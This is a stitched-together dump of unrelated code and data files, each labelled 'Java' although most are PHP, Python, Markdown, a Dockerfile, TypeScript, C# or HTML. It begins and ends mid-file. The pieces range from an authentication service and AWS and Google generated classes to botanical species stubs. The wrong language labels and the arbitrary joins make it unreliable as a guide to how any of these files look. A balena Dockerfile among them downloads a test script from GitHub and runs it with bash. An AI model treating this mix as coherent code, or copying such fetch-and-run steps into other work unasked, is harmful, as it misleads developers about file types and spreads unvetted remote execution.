phoneNumber='+12223334444')) ), ]) # Create the message request create_request = BusinessmessagesConversationsMessagesCreateRequest( businessMessagesMessage=message, parent='conversations/' + conversation_id) # Send the message bm_client.BusinessmessagesV1.ConversationsMessagesService( client=client).Create(request=create_request)
Java
<?php /** * Skeleton subclass for representing a row from the 'data2010' table. * * * * You should add additional methods to this class to meet the * application requirements. This class will only be generated as * long as it does not already exist in the output directory. * * @package propel.generator.fbapp */ class Data2010 extends BaseData2010 { }
Java
// // This file was generated by the JavaTM Architecture for XML Binding(JAXB) Reference Implementation, v2.2.11 // See <a href="http://java.sun.com/xml/jaxb">http://java.sun.com/xml/jaxb</a> // Any modifications to this file will be lost upon recompilation of the source schema. // Generated on: 2015.08.19 at 01:05:06 PM PDT // package com.google.api.ads.adwords.lib.jaxb.v201509; import javax.xml.bind.annotation.XmlEnum; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for SortOrder. * * <p>The following schema fragment specifies the expected content contained within this class. * <p> * <pre> * &lt;simpleType name="SortOrder"&gt; * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}string"&gt; * &lt;enumeration value="ASCENDING"/&gt; * &lt;enumeration value="DESCENDING"/&gt; * &lt;/restriction&gt; * &lt;/simpleType&gt; * </pre> * */ @XmlType(name = "SortOrder") @XmlEnum public enum SortOrder { ASCENDING, DESCENDING; public String value() { return name(); } public static SortOrder fromValue(String v) { return valueOf(v); } }
Java
--- layout: post title: Some sites to place holder your site date: 2016-10-10 categories: front-end skills tags: front-end skills --- * content {:toc}
Java
package ru.job4j; import org.junit.Test; import java.util.*; /** * Класс для тестирования. * @author agavrikov * @since 13.07.2017 * @version 1 */ public class TestTimeCollectionTest { /** * Тестирование метода добавления. */ @Test public void add() { TestTimeCollection methods = new TestTimeCollection(); List<String> linkedList = new LinkedList<String>(); long timeStart = new Date().getTime(); long timeEnd = methods.add(linkedList, 1000000); System.out.println(timeEnd - timeStart); List<String> arrayList = new ArrayList<String>(); timeStart = new Date().getTime(); timeEnd = methods.add(arrayList, 1000000); System.out.println(timeEnd - timeStart); Set<String> treeSet = new TreeSet<String>(); timeStart = new Date().getTime(); timeEnd = methods.add(treeSet, 1000000); System.out.println(timeEnd - timeStart); } /** * Тестирование метода удаления. */ @Test public void delete() { TestTimeCollection methods = new TestTimeCollection(); List<String> linkedList = new LinkedList<String>(); methods.add(linkedList, 100000); long timeStart = new Date().getTime(); long timeEnd = methods.delete(linkedList, 10000); System.out.println(timeEnd - timeStart); List<String> arrayList = new ArrayList<String>(); methods.add(arrayList, 100000); timeStart = new Date().getTime(); timeEnd = methods.delete(arrayList, 10000); System.out.println(timeEnd - timeStart); Set<String> treeSet = new TreeSet<String>(); methods.add(treeSet, 100000); timeStart = new Date().getTime(); timeEnd = methods.delete(treeSet, 10000); System.out.println(timeEnd - timeStart); } }
Java
package tinymonkeys.vue; import java.awt.Color; import java.awt.Graphics; import javax.swing.JPanel; /** * Classe du panneau de la carte. * * @version 1.0 * @author Camille Constant * */ public class VueCarte extends JPanel { /** * UID auto-généré. */ private static final long serialVersionUID = 4884966649331011259L; /** * Rapport entre la taille de la carte et la taille de l'écran. */ private static final double RAPPORT_ECRAN = 0.75; /** * Constante permettant de placer un objet à la moitié de l'écran. */ private static final int DIVISEUR_MILIEU = 2; /** * Constante permettant de placer un objet au quart de l'écran. */ private static final int DIVISEUR_QUART = 4; /** * Constante indiquant la couleur des cases représentant la mer. */ private static final Color OCEAN = new Color(0, 120, 220); /** * Taille de la case en nombre de pixels. */ private int tailleCase; /** * La coordonnee en abscisse du coin supérieur gauche de la grille. */ private int xGrille; /** * La coordonnee en ordonnée du coin supérieur gauche de la grille. */ private int yGrille; /** * Largeur de l'ecran en nombre de pixels. */ private final int largeurEcran; /** * Hauteur de l'ecran en nombre de pixels. */ private final int hauteurEcran; /** * Largeur de la grille en nombre de cases. */ private int largeurGrille; /** * Hauteur de la grille en nombre de cases. */ private int hauteurGrille; /** * La carte. */ private int[][] carte; /** * Constructeur de la vue de la carte. * * @param largeurEcran largeur de l'ecran en nombre de pixels. * @param hauteurEcran hauteur de l'ecran en nombre de pixels. * @param carte la carte a dessiner */ public VueCarte(int largeurEcran, int hauteurEcran, int[][] carte) { super(); this.largeurEcran = largeurEcran; this.hauteurEcran = hauteurEcran; this.largeurGrille = carte.length; this.hauteurGrille = carte[0].length; this.copieCarte(carte); this.placementGrille(); this.setBounds(this.xGrille, this.yGrille, this.largeurGrille * this.tailleCase + 1, this.hauteurGrille * this.tailleCase + 1); this.setOpaque(false); } /** * Dessine la carte de l'ile avec la grille. * * @param g le graphique dans lequel dessiner. */ public final void paintComponent(Graphics g) { super.paintComponent(g); this.dessineIle(g); this.dessineGrille(g); } /** * Place la carte au centre de l'écran. */ private void placementGrille() { final int diviseurLargeur; final int diviseurHauteur; final int largeurCase = (int) ((this.largeurEcran * RAPPORT_ECRAN) / this.largeurGrille); final int hauteurCase = (int) ((this.hauteurEcran * RAPPORT_ECRAN) / this.hauteurGrille); if (largeurCase < hauteurCase) { this.tailleCase = largeurCase; diviseurLargeur = DIVISEUR_QUART; diviseurHauteur = DIVISEUR_MILIEU; } else { this.tailleCase = hauteurCase; diviseurLargeur = DIVISEUR_MILIEU; diviseurHauteur = DIVISEUR_QUART; } this.xGrille = (int) ((this.largeurEcran - (this.tailleCase * this.largeurGrille)) / diviseurLargeur); this.yGrille = (int) ((this.hauteurEcran - (this.tailleCase * this.hauteurGrille)) / diviseurHauteur); } /** * Dessine la grille. * * @param g le graphique dans lequel dessiner. */ public void dessineGrille(Graphics g) { // La grille apparait en noir. g.setColor(Color.BLACK); // colonnes for (int i = 0; i <= (this.tailleCase * this.largeurGrille); i += this.tailleCase) { g.drawLine(i, 0, i, this.tailleCase * this.hauteurGrille); } // lignes for (int j = 0; j <= this.tailleCase * this.hauteurGrille; j += this.tailleCase) { g.drawLine(0, j, this.tailleCase * this.largeurGrille, j); } } /** * Dessine l'ile. * * @param g le graphique dans lequel dessiner. */ public final void dessineIle(Graphics g) { int i = -1; while (++i < this.largeurGrille) { int j = -1; while (++j < this.hauteurGrille) { // Si la case est de type mer. if (this.carte[i][j] == 0) { g.setColor(OCEAN); g.fillRect(i * this.tailleCase, j * this.tailleCase, this.tailleCase, this.tailleCase); } // Coloration inutile pour les cases terre. } } } /** * Modifie la carte de l'ile. * * @param carte la nouvelle carte. */ public final void setVueCarte(int[][] carte) { this.largeurGrille = carte.length; this.hauteurGrille = carte[0].length; this.copieCarte(carte); this.placementGrille(); this.setBounds(this.xGrille, this.yGrille, this.largeurGrille * this.tailleCase + 1, this.hauteurGrille * this.tailleCase + 1); this.setOpaque(false); } /** * Accesseur en lecture de la taille d'une case. * * @return la taille d'une case. */ public final int getTailleCase() { return this.tailleCase; } /** * Accesseur en lecture de l'abscisse de la grille. * * @return l'abscisse de la grille. */ public final int getXGrille() { return this.xGrille; } /** * Accesseur en lecture de l'ordonnee de la grille. * * @return l'ordonnee de la grille. */ public final int getYGrille() { return this.yGrille; } /** * Recopie de la carte dans l'attribut carte. * * @param carte la carte a copier. */ private void copieCarte(int[][] carte) { this.carte = new int[carte.length][carte[0].length]; int i = -1; while (++i < carte.length) { int j = -1; while(++j < carte[0].length) { this.carte[i][j] = carte[i][j]; } } } }
Java
package org.sagebionetworks.auth.services; import org.sagebionetworks.repo.manager.AuthenticationManager; import org.sagebionetworks.repo.manager.MessageManager; import org.sagebionetworks.repo.manager.UserManager; import org.sagebionetworks.repo.manager.authentication.PersonalAccessTokenManager; import org.sagebionetworks.repo.manager.oauth.AliasAndType; import org.sagebionetworks.repo.manager.oauth.OAuthManager; import org.sagebionetworks.repo.manager.oauth.OpenIDConnectManager; import org.sagebionetworks.repo.model.AuthorizationUtils; import org.sagebionetworks.repo.model.UnauthorizedException; import org.sagebionetworks.repo.model.UserInfo; import org.sagebionetworks.repo.model.auth.AccessToken; import org.sagebionetworks.repo.model.auth.AccessTokenGenerationRequest; import org.sagebionetworks.repo.model.auth.AccessTokenGenerationResponse; import org.sagebionetworks.repo.model.auth.AccessTokenRecord; import org.sagebionetworks.repo.model.auth.AccessTokenRecordList; import org.sagebionetworks.repo.model.auth.AuthenticatedOn; import org.sagebionetworks.repo.model.auth.ChangePasswordInterface; import org.sagebionetworks.repo.model.auth.LoginRequest; import org.sagebionetworks.repo.model.auth.LoginResponse; import org.sagebionetworks.repo.model.auth.NewUser; import org.sagebionetworks.repo.model.auth.PasswordResetSignedToken; import org.sagebionetworks.repo.model.oauth.OAuthAccountCreationRequest; import org.sagebionetworks.repo.model.oauth.OAuthProvider; import org.sagebionetworks.repo.model.oauth.OAuthUrlRequest; import org.sagebionetworks.repo.model.oauth.OAuthUrlResponse; import org.sagebionetworks.repo.model.oauth.OAuthValidationRequest; import org.sagebionetworks.repo.model.oauth.ProvidedUserInfo; import org.sagebionetworks.repo.model.principal.AliasType; import org.sagebionetworks.repo.model.principal.PrincipalAlias; import org.sagebionetworks.repo.transactions.WriteTransaction; import org.sagebionetworks.repo.web.NotFoundException; import org.sagebionetworks.util.ValidateArgument; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Service; @Service public class AuthenticationServiceImpl implements AuthenticationService { @Autowired private UserManager userManager; @Autowired private AuthenticationManager authManager; @Autowired private OAuthManager oauthManager; @Autowired private OpenIDConnectManager oidcManager; @Autowired private MessageManager messageManager; @Autowired private PersonalAccessTokenManager personalAccessTokenManager; @WriteTransaction @Override public void changePassword(ChangePasswordInterface request) throws NotFoundException { final long userId = authManager.changePassword(request); messageManager.sendPasswordChangeConfirmationEmail(userId); } @Override @WriteTransaction public void signTermsOfUse(AccessToken accessToken) throws NotFoundException { ValidateArgument.required(accessToken, "Access token"); ValidateArgument.required(accessToken.getAccessToken(), "Access token contents"); Long principalId = Long.parseLong(oidcManager.validateAccessToken(accessToken.getAccessToken())); // Save the state of acceptance authManager.setTermsOfUseAcceptance(principalId, true); } @Override public String getSecretKey(Long principalId) throws NotFoundException { return authManager.getSecretKey(principalId); } @Override @WriteTransaction public void deleteSecretKey(Long principalId) throws NotFoundException { authManager.changeSecretKey(principalId); } @Override public boolean hasUserAcceptedTermsOfUse(Long userId) throws NotFoundException { return authManager.hasUserAcceptedTermsOfUse(userId); } @Override public void sendPasswordResetEmail(String passwordResetUrlPrefix, String usernameOrEmail) { try { PrincipalAlias principalAlias = userManager.lookupUserByUsernameOrEmail(usernameOrEmail); PasswordResetSignedToken passwordRestToken = authManager.createPasswordResetToken(principalAlias.getPrincipalId()); messageManager.sendNewPasswordResetEmail(passwordResetUrlPrefix, passwordRestToken, principalAlias); } catch (NotFoundException e) { // should not indicate that a email/user could not be found } } @Override public OAuthUrlResponse getOAuthAuthenticationUrl(OAuthUrlRequest request) { String url = oauthManager.getAuthorizationUrl(request.getProvider(), request.getRedirectUrl(), request.getState()); OAuthUrlResponse response = new OAuthUrlResponse(); response.setAuthorizationUrl(url); return response; } @Override public LoginResponse validateOAuthAuthenticationCodeAndLogin( OAuthValidationRequest request, String tokenIssuer) throws NotFoundException { // Use the authentication code to lookup the user's information. ProvidedUserInfo providedInfo = oauthManager.validateUserWithProvider( request.getProvider(), request.getAuthenticationCode(), request.getRedirectUrl()); if(providedInfo.getUsersVerifiedEmail() == null){ throw new IllegalArgumentException("OAuthProvider: "+request.getProvider().name()+" did not provide a user email"); } // This is the ID of the user within the provider's system. PrincipalAlias emailAlias = userManager.lookupUserByUsernameOrEmail(providedInfo.getUsersVerifiedEmail()); // Return the user's access token return authManager.loginWithNoPasswordCheck(emailAlias.getPrincipalId(), tokenIssuer); } @WriteTransaction public LoginResponse createAccountViaOauth(OAuthAccountCreationRequest request, String tokenIssuer) { // Use the authentication code to lookup the user's information. ProvidedUserInfo providedInfo = oauthManager.validateUserWithProvider( request.getProvider(), request.getAuthenticationCode(), request.getRedirectUrl()); if(providedInfo.getUsersVerifiedEmail() == null){ throw new IllegalArgumentException("OAuthProvider: "+request.getProvider().name()+" did not provide a user email"); } // create account with the returned user info. NewUser newUser = new NewUser(); newUser.setEmail(providedInfo.getUsersVerifiedEmail()); newUser.setFirstName(providedInfo.getFirstName()); newUser.setLastName(providedInfo.getLastName()); newUser.setUserName(request.getUserName()); long newPrincipalId = userManager.createUser(newUser); return authManager.loginWithNoPasswordCheck(newPrincipalId, tokenIssuer); } @Override public PrincipalAlias bindExternalID(Long userId, OAuthValidationRequest validationRequest) { if (AuthorizationUtils.isUserAnonymous(userId)) throw new UnauthorizedException("User ID is required."); AliasAndType providersUserId = oauthManager.retrieveProvidersId( validationRequest.getProvider(), validationRequest.getAuthenticationCode(), validationRequest.getRedirectUrl()); // now bind the ID to the user account return userManager.bindAlias(providersUserId.getAlias(), providersUserId.getType(), userId); } @Override public void unbindExternalID(Long userId, OAuthProvider provider, String aliasName) { if (AuthorizationUtils.isUserAnonymous(userId)) throw new UnauthorizedException("User ID is required."); AliasType aliasType = oauthManager.getAliasTypeForProvider(provider); userManager.unbindAlias(aliasName, aliasType, userId); } @Override public LoginResponse login(LoginRequest request, String tokenIssuer) { return authManager.login(request, tokenIssuer); } @Override public AuthenticatedOn getAuthenticatedOn(long userId) { UserInfo userInfo = userManager.getUserInfo(userId); return authManager.getAuthenticatedOn(userInfo); } @Override public PrincipalAlias lookupUserForAuthentication(String alias) { return userManager.lookupUserByUsernameOrEmail(alias); } @Override public AccessTokenGenerationResponse createPersonalAccessToken(Long userId, String accessToken, AccessTokenGenerationRequest request, String oauthEndpoint) { UserInfo userInfo = userManager.getUserInfo(userId); return personalAccessTokenManager.issueToken(userInfo, accessToken, request, oauthEndpoint); } @Override public AccessTokenRecordList getPersonalAccessTokenRecords(Long userId, String nextPageToken) { UserInfo userInfo = userManager.getUserInfo(userId); return personalAccessTokenManager.getTokenRecords(userInfo, nextPageToken); } @Override public AccessTokenRecord getPersonalAccessTokenRecord(Long userId, Long tokenId) { UserInfo userInfo = userManager.getUserInfo(userId); return personalAccessTokenManager.getTokenRecord(userInfo, tokenId.toString()); } @Override public void revokePersonalAccessToken(Long userId, Long tokenId) { UserInfo userInfo = userManager.getUserInfo(userId); personalAccessTokenManager.revokeToken(userInfo, tokenId.toString()); } }
Java
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; class CreateTypeBuysTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('type_buys', function(Blueprint $table) { $table->increments('id'); $table->string('description'); $table->timestamps(); $table->softDeletes(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::drop('type_buys'); } }
Java
# -*- coding: utf-8 -*- #!/usr/bin/env python # # Copyright 2014 BigML # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from world import world from bigml.api import HTTP_OK def i_get_the_project(step, resource): resource = world.api.get_project(resource) world.status = resource['code'] assert world.status == HTTP_OK world.project = resource['object']
Java
# AUTOGENERATED FILE FROM balenalib/nanopi-neo-air-alpine:edge-run ENV GO_VERSION 1.16 # set up nsswitch.conf for Go's "netgo" implementation # - https://github.com/golang/go/blob/go1.9.1/src/net/conf.go#L194-L275 # - docker run --rm debian:stretch grep '^hosts:' /etc/nsswitch.conf RUN [ ! -e /etc/nsswitch.conf ] && echo 'hosts: files dns' > /etc/nsswitch.conf # gcc for cgo RUN apk add --no-cache git gcc ca-certificates RUN fetchDeps='curl' \ && set -x \ && apk add --no-cache $fetchDeps \ && mkdir -p /usr/local/go \ && curl -SLO "http://resin-packages.s3.amazonaws.com/golang/v$GO_VERSION/go$GO_VERSION.linux-alpine-armv7hf.tar.gz" \ && echo "e5ec1504696d3484c0161fe3a0bbd37179c50cd4856b5d492a282a767e45a5ad go$GO_VERSION.linux-alpine-armv7hf.tar.gz" | sha256sum -c - \ && tar -xzf "go$GO_VERSION.linux-alpine-armv7hf.tar.gz" -C /usr/local/go --strip-components=1 \ && rm -f go$GO_VERSION.linux-alpine-armv7hf.tar.gz ENV GOROOT /usr/local/go ENV GOPATH /go ENV PATH $GOPATH/bin:/usr/local/go/bin:$PATH RUN mkdir -p "$GOPATH/src" "$GOPATH/bin" && chmod -R 777 "$GOPATH" WORKDIR $GOPATH CMD ["echo","'No CMD command was set in Dockerfile! Details about CMD command could be found in Dockerfile Guide section in our Docs. Here's the link: https://balena.io/docs"] RUN curl -SLO "https://raw.githubusercontent.com/balena-io-library/base-images/8accad6af708fca7271c5c65f18a86782e19f877/scripts/assets/tests/test-stack@golang.sh" \ && echo "Running test-stack@golang" \ && chmod +x test-stack@golang.sh \ && bash test-stack@golang.sh \ && rm -rf test-stack@golang.sh RUN [ ! -d /.balena/messages ] && mkdir -p /.balena/messages; echo $'Here are a few details about this Docker image (For more information please visit https://www.balena.io/docs/reference/base-images/base-images/): \nArchitecture: ARM v7 \nOS: Alpine Linux edge \nVariant: run variant \nDefault variable(s): UDEV=off \nThe following software stack is preinstalled: \nGo v1.16 \nExtra features: \n- Easy way to install packages with `install_packages <package-name>` command \n- Run anywhere with cross-build feature (for ARM only) \n- Keep the container idling with `balena-idle` command \n- Show base image details with `balena-info` command' > /.balena/messages/image-info RUN echo $'#!/bin/bash\nbalena-info\nbusybox ln -sf /bin/busybox /bin/sh\n/bin/sh "$@"' > /bin/sh-shim \ && chmod +x /bin/sh-shim \ && ln -f /bin/sh /bin/sh.real \ && ln -f /bin/sh-shim /bin/sh
Java
# automate/server/user/views.py ################# #### imports #### ################# #from flask import render_template, Blueprint, url_for, \ # redirect, flash, request #from flask_login import login_user, logout_user, login_required #from automate.server import bcrypt, db #from automate.server import db #from automate.server.models import User #from automate.server.user.forms import LoginForm, RegisterForm ################ #### config #### ################ #user_blueprint = Blueprint('user', __name__,) ################ #### routes #### ################ #@user_blueprint.route('/register', methods=['GET', 'POST']) #def register(): # form = RegisterForm(request.form) # if form.validate_on_submit(): # user = User( # email=form.email.data, # password=form.password.data # ) # db.session.add(user) # db.session.commit() # # login_user(user) # # flash('Thank you for registering.', 'success') # return redirect(url_for("user.members")) # # return render_template('user/register.html', form=form) # # #@user_blueprint.route('/login', methods=['GET', 'POST']) #def login(): # form = LoginForm(request.form) # if form.validate_on_submit(): # user = User.query.filter_by(email=form.email.data).first() # if user: # #if user and bcrypt.check_password_hash( # # user.password, request.form['password']): # # login_user(user) # flash('You are logged in. Welcome!', 'success') # return redirect(url_for('user.members')) # else: # flash('Invalid email and/or password.', 'danger') # return render_template('user/login.html', form=form) # return render_template('user/login.html', title='Please Login', form=form) # # #@user_blueprint.route('/logout') #@login_required #def logout(): # logout_user() # flash('You were logged out. Bye!', 'success') # return redirect(url_for('main.home')) # # #@user_blueprint.route('/members') #@login_required #def members(): # return render_template('user/members.html') #
Java
<?php /** * PHP Version 5. * * @category Amazon * * @copyright Copyright 2009 Amazon Technologies, Inc. * * @see http://aws.amazon.com * * @license http://aws.amazon.com/apache2.0 Apache License, Version 2.0 * * @version 2009-01-01 */ /******************************************************************************* * Marketplace Web Service PHP5 Library * Generated: Thu May 07 13:07:36 PDT 2009 * */ /** * @see MarketplaceWebService_Model */ require_once 'MarketplaceWebService/Model.php'; /** * MarketplaceWebService_Model_ErrorResponse. * * Properties: * <ul> * * <li>Error: MarketplaceWebService_Model_Error</li> * <li>RequestId: string</li> * * </ul> */ class MarketplaceWebService_Model_ErrorResponse extends MarketplaceWebService_Model { /** * Construct new MarketplaceWebService_Model_ErrorResponse. * * @param mixed $data DOMElement or Associative Array to construct from. * * Valid properties: * <ul> * * <li>Error: MarketplaceWebService_Model_Error</li> * <li>RequestId: string</li> * * </ul> */ public function __construct($data = null) { $this->fields = array( 'Error' => array('FieldValue' => array(), 'FieldType' => 'MarketplaceWebService_Model_Error'), 'RequestId' => array('FieldValue' => null, 'FieldType' => 'string'), ); parent::__construct($data); } /** * Construct MarketplaceWebService_Model_ErrorResponse from XML string. * * @param string $xml XML string to construct from * * @return MarketplaceWebService_Model_ErrorResponse */ public static function fromXML($xml) { $dom = new DOMDocument(); $dom->loadXML($xml); $xpath = new DOMXPath($dom); $xpath->registerNamespace('a', 'http://mws.amazonaws.com/doc/2009-01-01/'); $response = $xpath->query('//a:ErrorResponse'); if ($response->length == 1) { return new self(($response->item(0))); } else { throw new Exception('Unable to construct MarketplaceWebService_Model_ErrorResponse from provided XML. Make sure that ErrorResponse is a root element'); } } /** * Gets the value of the Error. * * @return array of Error Error */ public function getError() { return $this->fields['Error']['FieldValue']; } /** * Sets the value of the Error. * * @param mixed Error or an array of Error Error * * @return $this instance */ public function setError($error) { if (!$this->_isNumericArray($error)) { $error = array($error); } $this->fields['Error']['FieldValue'] = $error; return $this; } /** * Sets single or multiple values of Error list via variable number of arguments. * For example, to set the list with two elements, simply pass two values as arguments to this function * <code>withError($error1, $error2)</code>. * * @param Error $errorArgs one or more Error * * @return MarketplaceWebService_Model_ErrorResponse instance */ public function withError($errorArgs) { foreach (func_get_args() as $error) { $this->fields['Error']['FieldValue'][] = $error; } return $this; } /** * Checks if Error list is non-empty. * * @return bool true if Error list is non-empty */ public function isSetError() { return count($this->fields['Error']['FieldValue']) > 0; } /** * Gets the value of the RequestId property. * * @return string RequestId */ public function getRequestId() { return $this->fields['RequestId']['FieldValue']; } /** * Sets the value of the RequestId property. * * @param string RequestId * * @return $this instance */ public function setRequestId($value) { $this->fields['RequestId']['FieldValue'] = $value; return $this; } /** * Sets the value of the RequestId and returns this instance. * * @param string $value RequestId * * @return MarketplaceWebService_Model_ErrorResponse instance */ public function withRequestId($value) { $this->setRequestId($value); return $this; } /** * Checks if RequestId is set. * * @return bool true if RequestId is set */ public function isSetRequestId() { return !is_null($this->fields['RequestId']['FieldValue']); } /** * XML Representation for this object. * * @return string XML for this object */ public function toXML() { $xml = ''; $xml .= '<ErrorResponse xmlns="http://mws.amazonaws.com/doc/2009-01-01/">'; $xml .= $this->_toXMLFragment(); $xml .= '</ErrorResponse>'; return $xml; } private $_responseHeaderMetadata = null; public function getResponseHeaderMetadata() { return $this->_responseHeaderMetadata; } public function setResponseHeaderMetadata($responseHeaderMetadata) { return $this->_responseHeaderMetadata = $responseHeaderMetadata; } }
Java
# Salix farinosa Hartig SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Taraxacum humbertii Maire SPECIES #### Status ACCEPTED #### According to Euro+Med Plantbase #### Published in null #### Original name null ### Remarks null
Java
# Diplodia cyparissa Cooke & Harkn. SPECIES #### Status ACCEPTED #### According to Index Fungorum #### Published in Grevillea 9(no. 51): 83 (1881) #### Original name Diplodia cyparissa Cooke & Harkn. ### Remarks null
Java
# Bulbophyllum scyphochilus Schltr. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Coscinodiscopsis jonesiana (Greville) E.A. Sar & I. Sunesen in Sar, Suneson & Hinz, 2008 SPECIES #### Status ACCEPTED #### According to World Register of Marine Species #### Published in null #### Original name null ### Remarks null
Java
# Cinnamomum citriodorum Thwaites SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Tecoma avellanedae Speg. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Cercanthemum squamiferum Tiegh. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Strobilanthes hirsuta Decne. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Matayba atropurpurea Radlk. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Nephelea arborea (L.) Sehnem SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
<!-- Portfolio Grid Section --> <section id="portfolio" class="bg-light-gray"> <div class="container"> <div class="row"> <div class="col-lg-12 text-center"> <h2 class="section-heading">Portfolio</h2> <h3 class="section-subheading text-muted"></h3> </div> </div> <div class="row"> {% for post in site.posts %} <div class="col-md-4 col-sm-6 portfolio-item"> <a href="#portfolioModal{{ post.modal-id }}" class="portfolio-link" data-toggle="modal"> <div class="portfolio-hover"> <div class="portfolio-hover-content"> <i class="fa fa-plus fa-3x"></i> </div> </div> <img src="img/portfolio/{{ post.thumbnail }}" class="img-responsive img-centered" alt="post.alt"> </a> <div class="portfolio-caption"> <h4>{{ post.title }}</h4> <p class="text-muted">{{ post.subtitle }}</p> </div> </div> {% endfor %} </div> </div> </section>
Java
/* * Copyright 2019 ThoughtWorks, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import {ApiRequestBuilder, ApiVersion} from "helpers/api_request_builder"; import SparkRoutes from "helpers/spark_routes"; export interface BulkUpdateSystemAdminJSON { operations: { users: { add?: string[], remove?: string[] } }; } export class AdminsCRUD { static API_VERSION_HEADER = ApiVersion.v2; static all() { return ApiRequestBuilder.GET(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER); } static bulkUpdate(bulkUpdateSystemAdminJson: BulkUpdateSystemAdminJSON) { return ApiRequestBuilder.PATCH(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER, {payload: bulkUpdateSystemAdminJson}); } }
Java
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.iotevents.model; import java.io.Serializable; import javax.annotation.Generated; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iotevents-2018-07-27/UntagResource" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class UntagResourceResult extends com.amazonaws.AmazonWebServiceResult<com.amazonaws.ResponseMetadata> implements Serializable, Cloneable { /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof UntagResourceResult == false) return false; UntagResourceResult other = (UntagResourceResult) obj; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; return hashCode; } @Override public UntagResourceResult clone() { try { return (UntagResourceResult) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } }
Java
// Copyright (c) kuicker.org. All rights reserved. // Modified By YYYY-MM-DD // kevinjong 2016-02-11 - Creation using System.IO; using System.Linq; using Xunit; namespace IsTo.Tests { public class TestHelper { internal static void StreamComparison( Stream stream1, Stream stream2) { var bufferSize = 2048; var buffer1 = new byte[bufferSize]; var buffer2 = new byte[bufferSize]; while(true) { var count1 = stream1.Read(buffer1, 0, bufferSize); var count2 = stream2.Read(buffer2, 0, bufferSize); Assert.True(count1 == count2); if(count1 == 0) { return; } Assert.True( buffer1 .Take(count1) .SequenceEqual(buffer2.Take(count2)) ); } } } }
Java
/* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/model_service.proto package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse} */ public final class ExportModelResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ExportModelResponse) ExportModelResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ExportModelResponse.newBuilder() to construct. private ExportModelResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ExportModelResponse() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ExportModelResponse(); } @java.lang.Override public final com.google.protobuf.UnknownFieldSet getUnknownFields() { return this.unknownFields; } private ExportModelResponse( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { this(); if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } com.google.protobuf.UnknownFieldSet.Builder unknownFields = com.google.protobuf.UnknownFieldSet.newBuilder(); try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; default: { if (!parseUnknownField(input, unknownFields, extensionRegistry, tag)) { 